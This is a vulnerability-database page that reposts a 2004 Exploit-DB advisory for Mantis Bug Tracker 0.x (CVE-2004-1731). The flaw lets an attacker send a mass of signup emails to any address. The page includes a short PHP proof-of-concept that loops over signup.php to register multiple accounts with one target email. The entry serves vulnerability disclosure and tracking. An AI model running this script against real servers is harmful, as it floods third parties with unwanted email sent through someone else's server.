Lucene search
+L

Mantis Bug Tracker 0.x - New Account Signup Mass Emailing

🗓️ 21 Aug 2004 00:00:00Reported by Jose AntonioType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 30 Views

Mantis Bug Tracker 0.x allows mass email attacks via new account signup vulnerabilities.

Related
Code
ReporterTitlePublishedViews
Family
nessus
Tenable Nessus
Mantis < 0.18.3 / 0.19.0a2 Multiple Vulnerabilities
18 Aug 200400:00
nessus
nessus
Tenable Nessus
Mantis < 0.18.3 / 0.19.0a2 Multiple Vulnerabilities
22 Aug 200400:00
nessus
cve
CVE
CVE-2004-1731
26 Feb 200505:00
cve
cvelist
Cvelist
CVE-2004-1731
26 Feb 200505:00
cvelist
euvd
EUVD
EUVD-2004-1725
7 Oct 202500:30
euvd
nvd
NVD
CVE-2004-1731
20 Aug 200404:00
nvd
source: https://www.securityfocus.com/bid/10995/info

Mantis is reportedly susceptible to a vulnerability in its signup process allowing mass email attacks.

When a new user signs up to Mantis, the system automatically sends an email message to the given email address. This email contains the users new password for the affected Mantis bug tracking system.

Mantis fails to ensure that only one account exists with the specified email address, and therefor an attacker can create a massive amount of email, directed at any target they wish. This email will originate from the Mantis server, and not the attacker.

The vendor has implemented a captcha system for new account signup requests in the CVS version of the software. All currently released versions of the software are reported vulnerable.

<?php

//Please, change it becuase is my e-mail :)
$email = "anyemail@address";
$base_user = "test";
$i = 0;
$site = "http://www.example.com";

for ($i=0;$i<=15;$i++)
{
echo("Sending e-mail number $i\n");
$user = "$base_user$i";
echo("New user is $user\n");
$url =
"http://$site/signup.php?username=$user&email=$email";
echo("URL is $url\n");
$fd = fopen($url,"r");
echo("E-mail $i sended\n");
fclose($fd);
}

?>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 Jun 2018 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.03201
30